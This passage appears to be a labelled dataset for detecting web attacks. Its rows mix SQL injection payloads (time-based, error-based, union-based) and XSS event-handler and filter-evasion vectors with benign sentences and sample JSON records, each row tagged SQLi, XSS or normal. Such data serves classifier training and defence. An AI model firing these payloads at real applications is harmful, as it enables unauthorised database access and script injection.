,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'kqip' like 'kqip",2,SQLi,11093 Some parameters offer a selection from a menu to which you give an unambiguous abbreviation to select an option.,3,normal,25536 "1 ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 2160 = 2160",2,SQLi,14704 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><option id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></option>",1,XSS,188 "1' ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'thce' = 'thce",2,SQLi,11995 "<link oncut=""alert(1)"" contenteditable>test</link>",1,XSS,5560 "{""id"":null,""firstName"":""Alisa"",""lastName"":""Maclennan"",""address"":""61047 Mayfield Ave"",""city"":""254"",""telephone"":""2833748140""}",3,normal,27058 and then use that information to select your seat.,3,normal,26368 Select a shade of lipstick for the evening.,3,normal,24082 <discard onpointermove=alert(1)>XSS</discard>,1,XSS,6590 1 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) -- yczq,2,SQLi,17642 Insert fresh ink into the printer.,3,normal,22949 "{""id"":null,""firstName"":""Heng Fok"",""lastName"":""Wong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27555 "<title onbeforecut=""alert(1)"" contenteditable>test</title>",1,XSS,3917 "<style>@keyframes slidein {}</style><rb style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></rb>",1,XSS,448 "{""id"":null,""name"":""chart""}",3,normal,27149 "1%' ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( '%' = '",2,SQLi,14055 "1"" ) and make_set ( 4539 = 6401,6401 ) and ( ""kglx"" = ""kglx",2,SQLi,17252 -9212 or 1026 = 7967#,2,SQLi,21616 "<table onmouseenter=""alert(1)"">test</table>",1,XSS,7127 1' ) as bscn where 6907 = 6907,2,SQLi,20545 "<a href=""\x08javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2442 "<picture draggable=""true"" ondragstart=""alert(1)"">test</picture>",1,XSS,3105 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( granted_role ) FROM ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER ) WHERE LIMIT = 7 ) ) AND 'i' = 'i",2,SQLi,11112 "<form onmouseleave=""alert(1)"">test</form>",1,XSS,7695 "end and ( ""xksk"" = ""xksk",2,SQLi,21189 <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>,1,XSS,6096 <svg><discard onbegin=alert(1)>,1,XSS,9489 -9657' ) as ziiq where 7725 = 7725 or 3038 = 3038,2,SQLi,18561 "end and ( ( ""%"" = """,2,SQLi,21933 Select refuse.,3,normal,24584 select ( case when ( 3672 = 8360 ) then 3672 else 3672* ( select 3672 from information_schema.character_sets ) end ) #,2,SQLi,13247 1' ) where 3588 = 3588,2,SQLi,21482 1 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) # bkjl,2,SQLi,16937 "<style>:target {transform: rotate(180deg);}</style><bdi id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></bdi>",1,XSS,689 "<pre onkeydown=""alert(1)"" contenteditable>test</pre>",1,XSS,5210 "1%' ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17184 "<html onmouseup=""alert(1)"">test</html>",1,XSS,8420 "1 where 9898 = 9898 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10369 "<tbody oncopy=""alert(1)"" contenteditable>test</tbody>",1,XSS,4922 "Select the three dots at the top of the screen again, and then select ""Move to trash"" to delete the photo.",3,normal,25582 "{""id"":null,""name"":""Ophanimon""}",3,normal,26936 Insert memory.,3,normal,23058 "1%"" ) ) union all select null,null,null#",2,SQLi,19544 "-2359' union all select 2687,2687,2687#",2,SQLi,19624 <figcaption onpointerover=alert(1)>XSS</figcaption>,1,XSS,5464 "1' ) as zxho where 5907 = 5907 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13781 "{""id"":null,""name"":""effort""}",3,normal,27525 "-1351"" where 6968 = 6968 or 5684 = 8582",2,SQLi,19591 1' ) where 5280 = 5280 and 4595 = 4595#,2,SQLi,19607 I need to decide where to have dinner.,3,normal,23900 "<style>:target {color:red;}</style><xmp id=x style=""transition:color 1s"" ontransitionend=alert(1)></xmp>",1,XSS,1291 "1' ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,12797 "The Disaster Artist arrives in select theaters Friday, December 8.",3,normal,25464 "1' ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10716 -4157' ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'rdhm' = 'rdhm,2,SQLi,10359 "{""id"":null,""name"":""please ring""}",3,normal,27007 She chose a dessert recipe to bake from scratch.,3,normal,23682 His extensive knowledge of banking was displayed in the evidence which he gave before the select committee on the Bank Acts in 1857.,3,normal,26103 "1'|| ( select 'vsfg' where 3547 = 3547 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) ) ||'",2,SQLi,11929 "{""id"":null,""firstName"":""Meena"",""lastName"":""Melanie"",""address"":""3 Aspen St"",""city"":""750"",""telephone"":""2148993488""}",3,normal,27074 "1"" or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15854 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ( 'jirc' = 'jirc,2,SQLi,15759 "1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( 'vfnl' = 'vfnl",2,SQLi,12182 "-9553"" ) as geih where 6453 = 6453 or 8453 = 8159--",2,SQLi,18287 "1"" ) ) rlike sleep ( 5 ) and ( ( ""fzlr"" = ""fzlr",2,SQLi,18838 "1'+ ( select 'vwzp' where 2729 = 2729 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,12477 [a](javascript:window.onerror=confirm;throw%201),1,XSS,6081 "<abbr oncopy=""alert(1)"" contenteditable>test</abbr>",1,XSS,5459 not,3,normal,23136 "1' ) as qaec where 6572 = 6572 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11373 "1"" ) ) as zemm where 3324 = 3324 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12081 "-9183"" ) as wctu where 2058 = 2058 or 3038 = 3038",2,SQLi,18556 "<time draggable=""true"" ondragenter=""alert(1)"">test</time>",1,XSS,4133 "1 ) ) as potk where 5040 = 5040 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16375 "1"" ) union all select null,null,null,null,null,null,null--",2,SQLi,17444 "1 where 8273 = 8273 union all select null,null,null,null,null,null,null,null#",2,SQLi,15432 exec xp,2,SQLi,22522 "<link draggable=""true"" ondragstart=""alert(1)"">test</link>",1,XSS,4136 "-4865 where 1386 = 1386 union all select 1386,1386,1386,1386#",2,SQLi,17057 "<dfn onclick=""alert(1)"">test</dfn>",1,XSS,9278 <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>,1,XSS,863 "1%' procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13428 "1'|| ( select 'zvpl' where 5877 = 5877 union all select null,null#",2,SQLi,16599 ";alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"";",1,XSS,1944 -8112' ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( 'xopg' = 'xopg,2,SQLi,10319 "<xmp onbeforepaste=""alert(1)"" contenteditable>test</xmp>",1,XSS,4333 "Open the ""Settings"" menu on your PS4 and select ""Devices.""2.",3,normal,25818 "1' ) where 8586 = 8586 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14143 "<data onbeforepaste=""alert(1)"" contenteditable>test</data>",1,XSS,3972 Select your authority.,3,normal,24875 Select liqueur.,3,normal,24523 "1%' or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and '%' = '",2,SQLi,12875 select ( case when ( 8820 = 4648 ) then 8820 else 8820* ( select 8820 from information_schema.character_sets ) end ) #,2,SQLi,13217 "<noscript onbeforepaste=""alert(1)"" contenteditable>test</noscript>",1,XSS,2777 "<menu draggable=""true"" ondragleave=""alert(1)"">test</menu>",1,XSS,4147 Select your announce.,3,normal,24961 "1"" ) ) as esho where 8864 = 8864 order by 1--",2,SQLi,19025 "<a href=""javas\x05cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2413 "1"" ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17502 "select * from users where id = 1 or @#""{ = 1 union select 1,version ( ) -- 1",2,SQLi,15481 "<style>@keyframes x{}</style><object style=""animation-name:x"" onanimationend=""alert(1)""></object>",1,XSS,1548 -8181' ) ) or 5926 = 3332#,2,SQLi,21003 "<applet onmousemove=""alert(1)"">test</applet>",1,XSS,6956 "<IMG SRC=x ondragleave=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3137 1' ) ) as plgq where 1121 = 1121,2,SQLi,20264 "1%' ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13256 "-2899"" ) ) as uyoc where 8417 = 8417 union all select 8417,8417,8417,8417--",2,SQLi,15651 "Benefits include ""R Us Dollars"" for select purchases during promotional programs.",3,normal,26330 "1"" ) as doai where 7024 = 7024 union all select null,null,null,null,null,null,null,null--",2,SQLi,14739 "<style><img src=""</style><img src=x onerror=alert(123)//"">",1,XSS,3807 Select the appropriate rating and add comments about your transaction.,3,normal,25604 ORDER BY 18#,2,SQLi,22312 "1 ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ( 8671 = 8671",2,SQLi,15184 "<IMG SRC=""jav ascript:javascript:alert(1);"">",1,XSS,6777 1'|| ( select 'gmkp' where 6016 = 6016,2,SQLi,19702 "1'|| ( select 'fdkl' where 4572 = 4572 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14086 1%' ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,16872 "-8409%' ) or make_set ( 9354 = 9354,7185 ) and ( '%' = '",2,SQLi,17665 1'|| ( select 'vvpn' from dual where 7011 = 7011 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) ||',2,SQLi,10044 "x' AND 1 = ( SELECT COUNT ( * ) FROM tabname ) ,",2,SQLi,18667 1' and 4374 = 2305,2,SQLi,22045 "<caption onkeypress=""alert(1)"" contenteditable>test</caption>",1,XSS,3329 "<track onmousemove=""alert(1)"">test</track>",1,XSS,7385 "{""id"":null,""name"":""Maractus""}",3,normal,27311 "<div draggable=""true"" contenteditable>drag me</div><li ondragover=alert(1) contenteditable>drop here</li>",1,XSS,1264 "1 where 2751 = 2751 union all select null,null,null,null--",2,SQLi,17383 mod,3,normal,23227 "1 ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( 8554 = 8554",2,SQLi,13141 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21",2,SQLi,13479 <object id=x onfocus=alert(1) type=text/html>,1,XSS,6585 "1"" ) ) and 6486 = 3843 and ( ( ""fbka"" like ""fbka",2,SQLi,18795 "iif ( 9875 = 8961,1,1/0 )",2,SQLi,21149 "<rp draggable=""true"" ondragleave=""alert(1)"">test</rp>",1,XSS,5023 "1' ) as vmmk where 5757 = 5757 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12607 "select * from users where id = 1 or 1#""@ union select version ( ) ,version ( ) -- 1",2,SQLi,15019 "1' ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( 'holo' = 'holo",2,SQLi,11437 1' ) ) as qaki where 5272 = 5272,2,SQLi,20290 [1].find(alert),1,XSS,9805 1' ) ) as gfzb where 7904 = 7904,2,SQLi,20283 1%' ) ) ) and 7533 = 7533 and ( ( ( '%' = ',2,SQLi,19197 select * from users where id = 1 <@1$ or 1 = 1 -- 1,2,SQLi,18265 -5615' ) where 5931 = 5931 or 8450 = 9229,2,SQLi,19428 <menuitem id=x tabindex=1 onactivate=alert(1)></menuitem>,1,XSS,4110 "<span onkeyup=""alert(1)"" contenteditable>test</span>",1,XSS,5215 "<form><button formaction=""javascript:alert(123)"">crosssitespt",1,XSS,3257 ><img src=x onerror=javascript:alert(`1`)>,1,XSS,7326 <form><input formaction=javascript:alert(1) type=image value=click>,1,XSS,2692 "1"" ) where 4849 = 4849 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14525 <command id=x tabindex=1 onactivate=alert(1)></command>,1,XSS,4629 I want to select a course for professional development.,3,normal,23702 "<div draggable=""true"" contenteditable>drag me</div><u ondragover=alert(1) contenteditable>drop here</u>",1,XSS,1321 I need to select the right paint colors for the room.,3,normal,23865 "-9923%' ) ) ) union all select 8985,8985,8985,8985,8985,8985,8985#",2,SQLi,16614 "<base onpaste=""alert(1)"" contenteditable>test</base>",1,XSS,5164 <address onpointerup=alert(1)>XSS</address>,1,XSS,7229 Sort the beads.,3,normal,22823 "1"" ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( ""whld"" = ""whld",2,SQLi,12216 "-6186' in boolean mode ) union all select 2990,2990,2990#",2,SQLi,17543 "<div draggable=""true"" ondragleave=""alert(1)"">test</div>",1,XSS,4531 "1%"" ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( ""%"" = """,2,SQLi,11691 1'+ ( select 'yahd' where 5850 = 5850,2,SQLi,19913 select sleep ( 5 ) # wihl,2,SQLi,21163 "1%"" ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( ""%"" = """,2,SQLi,12404 1' ) ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 'ykjs' like 'ykjs,2,SQLi,9965 "You can select ""Penguin Brand Dry Ice Retailer"" and enter your location for a list of stores in your town where you may be able to purchase your dry ice.",3,normal,25088 "-4427' ) ) union all select 6357,6357,6357,6357,6357#",2,SQLi,18086 "<a onkeyup=""alert(1)"" contenteditable>test</a>",1,XSS,6338 "<strong onmousedown=""alert(1)"">test</strong>",1,XSS,6985 "-2962' ) ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'hkjo' = 'hkjo",2,SQLi,10090 "<style>:target {color: red;}</style><input id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></input>",1,XSS,919 "union ( select NULL, ( select @@version ) ) --",2,SQLi,18913 "1 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13312 "1"" rlike sleep ( 5 ) and ""rylv"" like ""rylv",2,SQLi,19312 "jaVas%0Cript:/*--></tit%0le></st%0yle></text%0area></scri%0pt></xm%0p><sv%0g/on%0load='+/""/+/onmou%0seover=1/+/[*/[]/+al%0ert(1)//'>",1,XSS,572 "select * from users where id = 1 or ""%?"" or 1 = 1 -- 1",2,SQLi,17856 "<!--[if<img src=x onerror=alert(2)//]> -->//[""'`-->]]>]</div>",1,XSS,3416 Select sprint.,3,normal,24647 1 ) ) as kiqk where 7366 = 7366 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,14830 <body onfocusout=alert(1) id=x><iframe id=x>,1,XSS,7034 <svg><plaintext onload=alert(1)></plaintext>,1,XSS,6840 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ""%"" = """,2,SQLi,13902 "waitfor delay '0:0:5' and ( ( ( ""%"" = """,2,SQLi,19634 -8224' ) where 6504 = 6504 or 2461 = 5660,2,SQLi,19369 """) waitfor delay '0:0:20' /*",2,SQLi,20795 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ""%"" = """,2,SQLi,14050 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ""%"" = """,2,SQLi,14256 "1 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,19947 &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;,1,XSS,2219 "It is common for baby care gift packages to include a small package of diapers and sometimes baby wipes too, although wipes can be difficult to select with the wide range of perfumed and non-perfumed options.",3,normal,25973 Modify the code.,3,normal,22855 "<noscript draggable=""true"" ondragenter=""alert(1)"">test</noscript>",1,XSS,2829 ORDER BY 31337,2,SQLi,22196 Where's the skincare clinic?,3,normal,23648 "<nav onkeypress=""alert(1)"" contenteditable>test</nav>",1,XSS,4998 select * from users where id = 1 + ( \. ) or 1 = 1 -- 1,2,SQLi,17746 "<IMG SRC=x ondragover=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3264 Let's choose a destination for our next trip.,3,normal,23852 "<dialog onmousemove=""alert(1)"">test</dialog>",1,XSS,6841 The commissions in the three counties represented by the district will each select a candidate and then all three commissions will gather to select the replacement from that group.,3,normal,25476 "<fieldset onmouseenter=""alert(1)"">test</fieldset>",1,XSS,5743 "<style>:target {transform: rotate(180deg);}</style><html id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></html>",1,XSS,652 "1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'lshk' like 'lshk",2,SQLi,11118 ") union select * from information_schema.tables,",2,SQLi,18666 1 where 5311 = 5311 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,15431 "<tt draggable=""true"" ondragend=""alert(1)"">test</tt>",1,XSS,5397 XSS STYLE=xss:e/**/xpression(alert('XSS'))>,1,XSS,7085 Select a workout routine to follow.,3,normal,24222 "<optgroup onkeyup=""alert(1)"" contenteditable>test</optgroup>",1,XSS,3523 "1 ) as khkv where 2944 = 2944 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10946 Where's the best place to indulge in desserts?,3,normal,23810 "<map draggable=""true"" ondragstart=""alert(1)"">test</map>",1,XSS,4480 "<kbd draggable=""true"" ondrag=""alert(1)"">test</kbd>",1,XSS,5662 top['al\145rt'](1),1,XSS,9791 "<svg:svg><svg:mask id=""maskForClickjacking"" maskUnits=""objectBoundingBox"" maskContentUnits=""objectBoundingBox""><svg:rect x=""0.0"" y=""0.0"" width=""0.373"" height=""0.3"" fill=""white""/><svg:circle cx=""0.45"" cy=""0.7"" r=""0.075"" fill=""white""/></svg:mask></svg:svg></body>",1,XSS,69 -8722%' or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and '%' = ',2,SQLi,10800 1 ) ) ) or sleep ( 5 ) #,2,SQLi,21219 "1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 )",2,SQLi,13543 Select negotiate.,3,normal,24768 "-9558"" ) ) ) union all select 2935,2935,2935,2935,2935--",2,SQLi,17666 "<code onbeforepaste=""alert(1)"" contenteditable>test</code>",1,XSS,3841 select ( case when ( 3344 = 8103 ) then 3344 else 1/ ( select 0 ) end ) --,2,SQLi,15739 -4583' ) as evbo where 6055 = 6055 union all select 6055--,2,SQLi,17399 1'+ ( select 'wyed' where 9896 = 9896,2,SQLi,19912 "<a href=""javas cript:alert(1)"">XSS</a>",1,XSS,8308 "<div draggable=""true"" contenteditable>drag me</div><multicol ondrop=alert(1) contenteditable>drop here</multicol>",1,XSS,921 "-5579%"" ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""%"" = """,2,SQLi,10725 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><caption id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></caption>",1,XSS,167 Select the ideal dress.,3,normal,24431 1 and sleep 5,2,SQLi,22261 <caption onpointerover=alert(1)>XSS</caption>,1,XSS,6647 "1"" ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ""rzja"" like ""rzja",2,SQLi,14358 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( ( 9847 = 9847",2,SQLi,16309 1' ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( 'trzi' = 'trzi,2,SQLi,14306 <element id=x tabindex=1 onactivate=alert(1)></element>,1,XSS,4596 "1%"" and ( 3020 = 3020 ) *6703 and ""%"" = """,2,SQLi,19372 1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,10722 "1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) # usus",2,SQLi,13323 "<script>document.title = ""Current URL: "" + document.URL;</script>",1,XSS,2852 "1 ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19236 "1', ( select ( case when ( 3888 = 3888 ) then ( select count ( * ) from generate_series ( 1,5000000 ) ) else 1/ ( select 0 ) end ) )",2,SQLi,12662 "{""id"":null,""firstName"":""Isaac"",""lastName"":""Soon"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27495 "<sub draggable=""true"" ondragleave=""alert(1)"">test</sub>",1,XSS,4462 I need to select the right words for the speech.,3,normal,23715 "1"" ) as mohv where 2171 = 2171 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,14932 "<script onmouseenter=""alert(1)"">test</script>",1,XSS,6626 "<XML SRC=""xsstest.xml"" ID=I></XML>",1,XSS,9309 "On the top right, select the cog wheel (""Settings"") and then select ""Settings"" from the drop down menu.",3,normal,25841 "<sub onmousemove=""alert(1)"">test</sub>",1,XSS,8493 &#x03c,1,XSS,9870 <form onfocusout=alert(1) tabindex=1 id=x></form><input autofocus>,1,XSS,2737 "<bdo draggable=""true"" ondrag=""alert(1)"">test</bdo>",1,XSS,5671 "1' ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 'bfrq' like 'bfrq",2,SQLi,12055 1' ) where 8429 = 8429,2,SQLi,21403 "In 2017, you had until January 31 to select your plan.",3,normal,26021 <isindex onfocusout=alert(1) tabindex=1 id=x></isindex><input autofocus>,1,XSS,2380 1%' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( '%' = ',2,SQLi,15647 "<code draggable=""true"" ondragleave=""alert(1)"">test</code>",1,XSS,4174 "-6890"" ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""ftho"" like ""ftho",2,SQLi,12415 "1%"" ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ""%"" = """,2,SQLi,12766 "if(now()=sysdate(),sleep(3),0)/XOR(if(now()=sysdate(),sleep(3),0))OR""/",2,SQLi,16127 ? or 1=1 --,2,SQLi,22392 1 ) ) as zldh where 3302 = 3302 rlike ( select ( case when ( 1481 = 5677 ) then 1 else 0x28 end ) ) --,2,SQLi,14034 "<style>@keyframes slidein {}</style><keygen style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></keygen>",1,XSS,367 <iframe id=x tabindex=1 onbeforedeactivate=alert(1)></iframe><input autofocus>,1,XSS,2105 1' ) where 3187 = 3187 order by 1#,2,SQLi,20167 "<style>:target {transform: rotate(180deg);}</style><xss id=x style=""transition:transform 2s"" ontransitionrun=print()></xss>",1,XSS,691 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#",2,SQLi,18245 Select access.,3,normal,24602 "1%' union all select null,null,null,null--",2,SQLi,19283 ><svg onload=alert(1)//,1,XSS,9735 "<math><a xlink:href=""//jsfiddle.net/t846h/"">click",1,XSS,5712 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( ( ""%"" = """,2,SQLi,16058 begin user_lock.sleep ( 5 ),2,SQLi,20913 "-3862 ) ) as vqtl where 9629 = 9629 union all select 9629,9629,9629,9629,9629--",2,SQLi,15252 "<style>:target {color: red;}</style><del id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></del>",1,XSS,1095 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#",2,SQLi,18989 <tt id=x tabindex=1 onactivate=alert(1)></tt>,1,XSS,6721 "{""id"":null,""firstName"":""Ayodhyala"",""lastName"":""Bhaskara Sri Vatsav"",""address"":""Bedok Shopping Complex 342 Bedok Road"",""city"":""866"",""telephone"":""1930443381""}",3,normal,27403 "select * from users where id = '1' %!<@ union select 1,version ( ) -- 1'",2,SQLi,15923 "select * from users where id = 1 union select @<@,version ( ) -- 1",2,SQLi,16568 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><table id=x style=""position:absolute;"" 